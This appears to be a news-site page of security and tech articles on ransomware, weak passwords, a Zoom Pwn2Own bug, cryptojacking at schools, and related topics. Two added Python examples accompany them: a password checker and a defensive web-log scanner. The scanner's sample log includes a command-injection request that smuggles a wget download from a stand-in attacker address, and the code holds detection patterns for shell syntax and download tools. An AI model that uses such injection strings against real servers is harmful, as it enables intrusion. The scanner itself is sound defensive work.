More stories


    Who do I pay to get the 'phone' removed from my iPhone?

    The smartphone is the ultimate convergence device. It takes a number of useful gadgets and combines them into a single, portable device. A smartphone can act as your portable computer, navigation device, camera, music player, and much more.

    It’s also a phone.

    And the phone is the most useless bit.

    If you’re anything like me, you rarely, if ever, make a call. Instead, you send an email or a quick message. And as for calls you get in, a good 95 percent are junk, and the remainder could have been an email or a quick message.

    Calls are a wasteland. Pretty much every time I hit that green button on a call from someone who isn’t in my contacts, I end up regretting it. And folks on my contacts list know not to call me.

    A quick look through my calls list for the past year shows little more than scams, timewasters, nonsense, and garbage. Perhaps one percent was useful, but again, could have been a message.

    The phone is a device from a different era. It’s a device that emits an annoying noise, demanding immediate attention. While the device itself has changed, it retains the worst of its original qualities — a device that emits an annoying noise and demands immediate attention.

    You could argue that text messages and emails are the same, and you’d be right. The difference is that these technologies have evolved a bit in order to try to remain relevant and useful. That said, I’d happily ditch text messaging too, because the signal to noise ratio is very poor there too.

    Maybe something could be done to make calls and texts a bit better. Visual voicemail on the iPhone has made this feature a tiny bit more bearable. Maybe something along the lines of Sign in with Apple ID, where I have the option of hiding my true phone number and use disposable ones that I can manage — and by manage, I mean block — down the line.

    Now, I’m not suggesting that Apple and Google rip the phone part out of their smartphones. Some of you still use the phone and text messaging. What I’m asking for is a way to kill both of them. I don’t know about you folks, but I could live without them. I’d even pay to have a smartphone that does everything a smartphone should do except be a phone.

    Let me know what you think in the comments below.


    Ransomware: The internet's biggest security crisis is getting worse. We need a way out

    Organisations continue to fall victim to ransomware, and yet progress on tackling these attacks, which now constitute one of the biggest security problems on the internet, remains slow.

    From small companies to councils, government agencies and big business, the number and range of organisations hit by ransomware is rising. One recent example: schools with 36,000 students have been hit, leaving pupils without access to email as attempts were made to get systems back online. That’s at least four chains of schools attacked in the last month.

    Ransomware gangs are getting craftier, and nastier, in their relentless pursuit of profit. It’s not enough to break into computer systems and encrypt the data to render it useless. Now the crooks are stealing some of the data and threatening to reveal it. And it’s not just data such as customer records: the cyber criminals will look for anything that might be sensitive or embarrassing on the network, and use the threat of publishing it as leverage against victims. And in many cases it seems to work.

    So what can be done to stop these attacks? Organisations of all sizes need to understand the ransomware threat, and figure out how to improve their own security – even getting the basics right can go a long way towards deterring attacks. The software industry also needs to do a better job of building secure software. Is this going to happen? That’s unlikely, as there’s just too much pressure to ship software fast and generate profit. The multiple ways companies can customise and integrate software also means that even if it ships as perfectly secure, security holes will emerge as soon as it’s used in the real world. Worse, ransomware groups are adept at seizing on newly discovered flaws and utilising them as part of their attacks, with the ransom money providing funds to sustain longer and more complicated attacks. In the longer term, the general shift to cloud computing, which has so far proved more secure, might help.

    Tackling the perpetrators themselves is the next challenge, although here geography plays a big role. Many of these groups are located in Russia, which means that law enforcement has found it hard to pursue cases. It may be possible to disrupt the efforts of these groups in other ways: police have had some success in disrupting botnets and other online crime rings, so perhaps something similar is possible here, even if this disruption tends to be only temporary. Here again, there’s little chance of improvement in the short to medium term, unless there’s a significant thawing of international relations.

    To pay or not to pay?

    One of the trickiest decisions concerns ransom payment. It’s understandable that a company may feel it has no choice but to pay up to regain access to its data, given that the alternative is to go out of business. But every ransom paid rewards the cyber criminals and sends a signal to others that there’s profit to be made.

    Making it illegal for companies to pay ransoms seems like a very big step to take. But this is increasingly being mentioned. A recent report from defence think tank RUSI (Royal United Services Institute) notes that “policymakers should carefully examine the feasibility and suitability of making ransom payment illegal in the UK, which could lead in turn to a ‘protective’ effect resulting from the discouragement of ransomware attacks against UK targets.”

    It’s a decision that could have some painful consequences. News of the change would take a while to filter through, so if any country were to ban ransom payment there would, at the very least, be a short to medium term situation where companies were still getting hit with ransomware. Ransomware gangs are opportunists and may not realise that a company is based in the UK, and may encrypt the systems anyway. They’re unlikely to hand over the decryption key just because the victim can’t pay up.

    If companies can’t pay ransoms and don’t have any other way to restore their data, they will face huge costs and disruption – potentially enough to put them out of business. Even organisations with backups and the required technical know-how will be forced to spend time and money restoring their systems. That could put them at a significant disadvantage compared to ransomware victims based elsewhere.

    Ransomware gangs are certainly capable of avoiding certain territories when planning attacks (they tend to avoid Russia for example), so, in the longer term, a ban on paying ransoms may have the desired impact by making UK organisations less profitable targets. Still, there’s no sign that the government is currently planning on going down this route. But as the cost of ransomware attacks continues to rise, we need to find a way to counter them – and soon.

    ZDNet’s Monday Morning Opener: The Monday Morning Opener is our opening salvo for the week in tech. Since we run a global site, this editorial publishes on Monday at 8:00am AEST in Sydney, Australia, which is 6:00pm Eastern Time on Sunday in the US. It is written by a member of ZDNet’s global editorial board, which is comprised of our lead editors across Asia, Australia, Europe, and North America.


    Nation-state cyber attacks targeting businesses are on the rise

    Businesses are increasingly coming under fire from nation-state backed hackers as governments around the world engage in attacks to steal secrets or lay the foundations for future attacks.

    Nation States, Cyberconflict and the Web of Profit, a study by cybersecurity researchers at HP and criminologists at the University of Surrey, warns that the number of significant nation-state attacks has risen significantly over the last three years – and that enterprises and businesses are increasingly being targeted.

    An analysis of nation-state cyber attacks between 2017 and 2020 reveals that just over a third of organisations targeted were businesses: cyber defence, media, government and critical infrastructure are all also common targets in these attacks, but enterprise has risen to the top of the list.

    “Irrespective of sector or size, business appears now to face comparable risks from nation states as it has done from traditional cybercriminals,” said the research paper.

    The main aim of these attacks is obtaining intellectual property or business intelligence, with technology firms and pharmaceutical companies at particular risk.

    The events of the last year have increased the risks because not only have nation states been conducting campaigns in an effort to gain access to research on Covid-19 vaccines, the way in which many people are working from home has left them – and their employers – at additional risk from phishing and other attacks.

    “Nation states are devoting significant time and resources to achieving strategic cyber advantage to advance their national interests, intelligence gathering capabilities, and military strength through espionage, disruption and theft,” said Dr. Mike McGuire, senior lecturer in criminology at the University of Surrey. “Attempts to obtain IP data on vaccines and attacks against software supply chains demonstrate the lengths to which nation states are prepared to go to achieve their strategic goals.”

    Hackers are also willing to use techniques that could put many companies at risk in order to target a few.

    “There’s now a willingness to compromise thousands of networks and businesses, creating huge collateral damage, when in reality the true targets of those cyberattacks will have been much smaller,” said Ian Pratt, global head of security for personal systems at HP Inc.

    In order to protect networks against cyber attacks, the report recommends that organisations do everything possible to secure endpoints and to segment networks, so sensitive information isn’t stored in easy-to-reach areas if an attacker manages to gain entry to the network. It’s also recommended that organisations apply security patches in a timely manner, so they’re protected against known vulnerabilities when they emerge.

    “As the scope and sophistication of nation state attacks continues to increase, it’s vital that organizations invest in security that helps them to stay ahead of these constantly evolving threats,” said Pratt.


    These are the terrible passwords that people are still using. Here's how to do better

    People are using easy-to-guess passwords, including their pet’s name, family members’ names, significant dates, their favourite sports team – or even ‘Password’ – and that could be putting them at risk of their accounts being compromised by cyber criminals.

    Research by the National Cyber Security Centre (NCSC) suggests that 15% of people have used their pet’s name as their password at some point, while 14% have used the name of a family member. A further 13% have used a significant date, such as a birthday or anniversary, while 6% have used the sports team they support as their password.

    While these passwords are easy for people to remember, they could be putting their accounts at risk of being broken into by criminals. Attackers could scrape information from public social media posts that could provide hints to things like pet names. They could then attempt to use this information to breach accounts. They could also use a brute force attack tool, which can crack accounts that use simple one-word passwords with relative ease. The use of default credentials like ‘password’ also provides cyber criminals with an easy method of breaching accounts.

    By using a weak password, people could be putting personal information or financial details at risk – especially if that same password is used across multiple accounts. They could even potentially put their employer at risk from cyberattacks, if the stolen password is also used to secure corporate accounts and cyber criminals attempt to see if the password they’ve taken from a personal account works.

    The NCSC is, therefore, urging people to follow its advice and make passwords three random words to help secure their accounts. The idea is that three words are relatively easy to remember, but by making them random, it’ll stop cyber criminals from being able to guess their way into accounts, even with the aid of brute force tools.

    “We may be a nation of animal lovers, but using your pet’s name as a password could make you an easy target for callous cyber criminals,” said Nicola Hudson, NCSC director for policy and communications. “I would urge everybody to visit cyberaware.gov.uk and follow our guidance on setting secure passwords, which recommends using passwords made up of three random words.”


    The NCSC also recommends that users should make sure their email password is separate from any other password they have, because if an attacker does steal your email user name and password, it could provide them access to other sites that use your email address as the login name. In addition to this, the NCSC suggests that users should save passwords to their web browser. Not only does this allow users to easily log in to websites, it also helps protect them against some cybercrime – for example, the password manager won’t fill in credentials if the website is a fake version of the site designed to steal credentials. It’s also recommended that users should turn on two-factor authentication to provide an additional barrier to attacks.
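The two halves of the NCSC advice above (why pet names, family names, dates, sports teams and ‘password’ are weak; why three random words are better) can be made concrete in code. The following is an added example written for this page, not code from the NCSC or from ZDNet: a small checker that flags passwords built from facts an attacker could read off a public profile, plus a three-random-word generator that picks words with a CSPRNG rather than letting the user choose them. The word list, the default-password set, and the `known_facts` argument are constructed for the demonstration.

```python
import math
import re
import secrets

# Constructed word list for the demonstration only; a real generator needs a
# list of thousands of words (e.g. a 7776-word diceware list) for useful entropy.
WORDLIST = [
    "anchor", "blanket", "copper", "dolphin", "ember", "falcon", "garden",
    "harbor", "island", "jigsaw", "kettle", "lantern", "meadow", "nickel",
    "orbit", "pepper", "quartz", "ribbon", "saddle", "timber", "umbrella",
    "velvet", "walnut", "yonder", "zipper",
]

# Constructed sample of default / top-ranked passwords (not a full breach list).
DEFAULTS = {"password", "passw0rd", "123456", "qwerty", "letmein"}

YEAR = re.compile(r"(19|20)\d{2}")
TRAILING_JUNK = re.compile(r"[0-9!@#$%^&*._-]+$")  # digits/symbols bolted onto a word


def weak_password_reasons(password, known_facts=()):
    """Return the reasons a password is easy to guess ([] if none was found).

    known_facts are strings an attacker could read off a public profile: a pet's
    name, a family member's name, a sports team. Only the categories named in
    the NCSC survey are modelled here (hypothetical checker, not NCSC code)."""
    low = password.lower()
    core = TRAILING_JUNK.sub("", low)      # "rex2015!" -> "rex"
    reasons = []
    if low in DEFAULTS or core in DEFAULTS:
        reasons.append("default or top-ranked password")
    for fact in known_facts:
        if len(fact) >= 3 and fact.lower() in low:
            reasons.append(f"contains publicly guessable fact '{fact}'")
    if YEAR.search(low):
        reasons.append("contains a year (birthday/anniversary guess)")
    if core.isalpha() and core in WORDLIST:
        reasons.append("single dictionary word plus trailing digits/symbols")
    return reasons


def three_random_words(rng=secrets, sep="-", words=WORDLIST):
    """NCSC-style passphrase: three words picked with a CSPRNG, not by the user."""
    return sep.join(rng.choice(words) for _ in range(3))


def passphrase_bits(n_words, list_size):
    """Entropy in bits of n uniformly chosen words from a list of list_size words."""
    return n_words * math.log2(list_size)


if __name__ == "__main__":
    profile = ["Rex", "Arsenal"]  # constructed: what a scraped social profile might yield
    for pw in ["Rex2015!", "Password", "anchor99", three_random_words()]:
        print(f"{pw!r:28} -> {weak_password_reasons(pw, profile) or 'no obvious weakness'}")
    print(f"3 words from {len(WORDLIST)} -> {passphrase_bits(3, len(WORDLIST)):.1f} bits")
    print(f"3 words from 7776      -> {passphrase_bits(3, 7776):.1f} bits")
```

The entropy helper makes the caveat visible: three words from the 25-word toy list give under 14 bits, which a brute-force tool clears instantly, while three words from a 7776-word list give about 38.8 bits. The strength of the three-random-words approach comes from the size of the list and the randomness of the choice, not from the number three.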


    Critical Zoom vulnerability triggers remote code execution without user input

    A zero-day vulnerability in Zoom which can be used to launch remote code execution (RCE) attacks has been disclosed by researchers. 

    Pwn2Own, organized by the Zero Day Initiative, is a contest for white-hat cybersecurity professionals and teams to compete in the discovery of bugs in popular software and services. The latest competition included 23 entries, competing in different categories including web browsers, virtualization software, servers, enterprise communication, and local escalation of privilege. For successful entrants, the financial rewards can be high — and in this case, Daan Keuper and Thijs Alkemade earned themselves $200,000 for their Zoom discovery.

    The researchers from Computest demonstrated a three-bug attack chain that caused an RCE on a target machine, and all without any form of user interaction. As Zoom has not yet had time to patch the critical security issue, the specific technical details of the vulnerability are being kept under wraps. However, an animation of the attack in action demonstrates how an attacker was able to open the calculator program of a machine running Zoom following its exploit.

    As noted by Malwarebytes, the attack works on both Windows and Mac versions of Zoom, but it has not — yet — been tested on iOS or Android. The browser version of the videoconferencing software is not impacted.

    In a statement to Tom’s Guide, Zoom thanked the Computest researchers and said the company was “working to mitigate this issue with respect to Zoom Chat.” In-session Zoom Meetings and Zoom Video Webinars are not affected. “The attack must also originate from an accepted external contact or be a part of the target’s same organizational account,” Zoom added. “As a best practice, Zoom recommends that all users only accept contact requests from individuals they know and trust.”

    Vendors have a 90-day window, which is standard practice in vulnerability disclosure programs, to resolve the security issues found. End-users just need to wait for a patch to be issued — but if worried, they can use the browser version in the meantime.

    “This event, and the procedures and protocols that surround it, demonstrate very nicely how white-hat hackers work, and what responsible disclosure means,” Malwarebytes says. “Keep the details to yourself until protection in the form of a patch is readily available for everyone involved (with the understanding that vendors will do their part and produce a patch quickly).”

    Other successful attacks of note during the contest include:

      • Apple Safari: Jack Dates, kernel-level code execution, $100,000
      • Microsoft Exchange: DEVCORE, complete server takeover, $200,000
      • Microsoft Teams: OV, code execution, $200,000
      • Ubuntu Desktop: Ryota Shiga, standard user to root, $30,000

    Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0

    Washington State educational organizations targeted in cryptojacking spree

    US educational organizations are being targeted by threat actors intent on compromising their networks to covertly mine cryptocurrency. 

    Otherwise known as cryptojacking attacks, this form of assault is usually mired in stealth as the overall aim is to quietly install cryptocurrency mining components that leech stolen computational power. Miner software abused by cyberattackers may attempt to generate cryptocurrency including Monero (XMR), Litecoin (LTC), Bitcoin (BTC), and Ethereum (ETH), and even if small amounts are mined, compromising large numbers of systems can make these attacks lucrative.

    According to a new advisory released by Palo Alto Networks’ Unit 42 team, cryptojacking incidents have recently taken place against educational institutions in Washington State. The researchers say that a UPX-packed cpuminer — used to mine LTC and BTC — has been delivered by way of malicious traffic.

    The first attack, spotted on February 16, involved a malicious HTTP request sent to a domain owned by an educational establishment that at first seemed like a “trivial command injection vulnerability,” according to the team, but upon further examination, revealed that it was actually a command for a webshell backdoor. If deployment is successful, the backdoor is then able to call and execute the cryptomining payload. In addition, the malware will download a mini shell that pretends to be a wp-load.php file.

    “Since the mini shell is not moved elsewhere, we speculate that the current directory of the mini shell, as well as the backdoor, is a web directory exposed to the internet,” the report says. Cryptocurrency mined on infected systems is sent to two wallets owned by the operators.

    In two other incidents, there were some differences when it came to user agent strings, pass values, and algorithms, but the general attack method remained the same. “The malicious request […] exhibits several similarities,” Unit 42 noted. “It’s the same attack pattern delivering the same cpuminer payload against the same industry (education), suggesting it’s likely the same perpetrator behind the cryptojacking operation.”

    In March, a study of K-12 schools across the United States revealed a “record-breaking” year of cybersecurity incidents in 2020. The report cataloged over 400 incidents including ransomware, phishing attempts, website defacement, and denial-of-service (DoS) attacks.
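Two of the observations above translate directly into web-server log checks a defender can run: a request that looks like command injection against a web application, and a file called wp-load.php sitting in a web directory where WordPress would never put it. The scanner below is an added example written for this page, not code from Unit 42 or from the advisory. The log lines are constructed (documentation-range IP addresses, Apache combined format) and are not the real requests from the report; the rule that the only legitimate wp-load.php lives at the WordPress install root is an assumption made configurable through `wp_root`.

```python
import re
from pathlib import PurePosixPath
from urllib.parse import unquote_plus, urlsplit

# Constructed Apache combined-format log lines for the demonstration; they are
# not taken from the Unit 42 advisory and use documentation-range IP addresses.
SAMPLE_LOG = """\
203.0.113.5 - - [16/Feb/2021:10:01:12 +0000] "GET /wp-load.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [16/Feb/2021:10:01:13 +0000] "POST /wp-content/uploads/wp-load.php HTTP/1.1" 200 88 "-" "python-requests/2.25"
198.51.100.7 - - [16/Feb/2021:10:02:40 +0000] "GET /index.php?page=about HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.9 - - [16/Feb/2021:10:03:01 +0000] "GET /cgi-bin/tool.cgi?host=example.com;wget+http://203.0.113.99/x HTTP/1.1" 500 0 "-" "curl/7.68"
"""

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Assumption: the only legitimate wp-load.php lives at the WordPress install root.
WORDPRESS_ROOT = "/"
SHELL_META = re.compile(r"[;|`]|\$\(|&&")
DOWNLOAD_TOOL = re.compile(r"\b(wget|curl)\b")


def scan_log(text, wp_root=WORDPRESS_ROOT):
    """Return a list of (ip, target, reasons) for requests worth a second look."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # skip lines that are not in combined format
        target = m.group("target")
        parts = urlsplit(target)
        decoded = unquote_plus(parts.query)
        reasons = []
        # A file named like WordPress's loader, but not where WordPress keeps it.
        if PurePosixPath(parts.path).name == "wp-load.php" and \
                str(PurePosixPath(wp_root) / "wp-load.php") != parts.path:
            reasons.append("wp-load.php outside the WordPress root")
        # Query strings carrying shell syntax point at command-injection attempts.
        if SHELL_META.search(decoded):
            reasons.append("shell metacharacters in request")
        if DOWNLOAD_TOOL.search(decoded):
            reasons.append("download utility referenced in request")
        if reasons:
            findings.append((m.group("ip"), target, reasons))
    return findings


if __name__ == "__main__":
    for ip, target, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip:15} {target}\n    -> {', '.join(reasons)}")
```

Running it over the sample flags the second line (a wp-load.php under an uploads directory) and the fourth (a query string carrying a shell separator and a download utility), and leaves the two ordinary requests alone. In practice the same rules belong in a SIEM query rather than a script, and the path check should be paired with a file-integrity baseline of the web root so a dropped mini shell is caught even when the request that created it was not logged.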


    US adds seven Chinese supercomputing organisations onto Entity List

    In another move aimed at restricting the development of Chinese technology, the US Commerce Department has added seven Chinese supercomputing entities to its Entity List for allegedly supporting China’s military efforts. The newly added entities that are companies are the Shanghai High-Performance Integrated Circuit Design Center, Sunway Microelectronics, and Tianjin Phytium Information Technology. The remaining organisations are the National Supercomputing Centers in Jinan, Shenzhen, WuXi, and Zhengzhou.

    Companies placed on the Entity List are banned from buying parts and components from US companies without government approval.

    According to the department, these entities are involved with building supercomputers used as part of China’s destabilising military modernisation efforts and its weapons of mass destruction programs.

    “Supercomputing capabilities are vital for the development of many — perhaps almost all — modern weapons and national security systems, such as nuclear weapons and hypersonic weapons. The Department of Commerce will use the full extent of its authorities to prevent China from leveraging US technologies to support these destabilising military modernisation efforts,” US Secretary of Commerce Gina Raimondo said.

    The newest Entity List additions are the latest among many that the US has made against Chinese businesses, including Huawei, which was placed on the Entity List almost two years ago. In the past year, the US has added Chinese chipmaker SMIC, drone company DJI Technology, and a bevy of other Chinese-based technology companies to the list.

    The reasons for doling out these restrictions have ranged from preventing China’s alleged efforts of destabilising military activities, to standing up against the repression of Uyghur Muslims and other Muslim ethnic minorities within China, to spying. In addition to placing various Chinese companies on the Entity List, the US government has also enforced other restrictions onto Chinese technology companies by labelling them as national security threats or Communist Chinese military companies (CCMC).


    Facebook tackles deepfake spread and troll farms in latest moderation push

    Facebook has removed a troll farm, spreaders of misinformation, and creators of deepfake images in its latest moderation efforts. 

    The company’s latest Coordinated Inauthentic Behavior (CIB) report, published this week, lists Facebook’s most recent efforts to reduce coordinated, inauthentic behavior across the network.

    According to the March CIB report, Facebook investigated and wiped out a “long-running” troll farm located in Albania. The troll farm’s members primarily targeted an Iranian audience and are thought to have ties to Mojahedin-e Khalq (MEK), a political-militant group made up of several thousand members. MEK was exiled to Albania in the 1980s and now appears to be running a network made up of both genuine and fake accounts to spread information that is critical of the Iranian government and that praises MEK’s activities.

    Facebook says that MEK-related content sharing spiked in 2017 and 2020 via three separate clusters, but the majority of the group’s efforts to grow an audience have failed.

    “Most of its accounts were run by operators in Albania who routinely shared technical infrastructure,” the company notes. “This meant that the same operator was able to run multiple accounts; conversely, multiple operators were able to run the same account. These are some of the hallmarks of a so-called troll farm — a physical location where a collective of operators share computers and phones to jointly manage a pool of fake accounts as part of an influence operation.”

    In addition, Facebook is tackling deepfakes, images generated through the application of artificial intelligence (AI). While the company started taking down fake imagery three years ago, networks of fake accounts are now using images produced by generative adversarial networks (GAN) to pose as independent news outlets and investigative journalists. After reviewing research provided by FireEye on a GAN-backed network located in Spain and El Salvador, the firm removed accounts and pages that were publishing information concerning a mayoral election at “spam-like” rates. A further two networks have also been wiped out, bringing Facebook’s total deletion count to seven operations that made use of AI-generated images.

    The social media giant has also documented its customary disruption of inauthentic networks. In total, 14 CIB operations were disrupted in March that originated from countries including Argentina, Egypt, Israel, Mexico, and Georgia, leading to the deletion of over 1,100 accounts, 255 pages, and 34 groups.

    Last month, Facebook said it had managed to detect and take down a Chinese network of cyberattackers using the platform to distribute malware. The operators, thought to be part of Earth Empusa or Evil Eye groups, used fake profiles to target journalists and activists.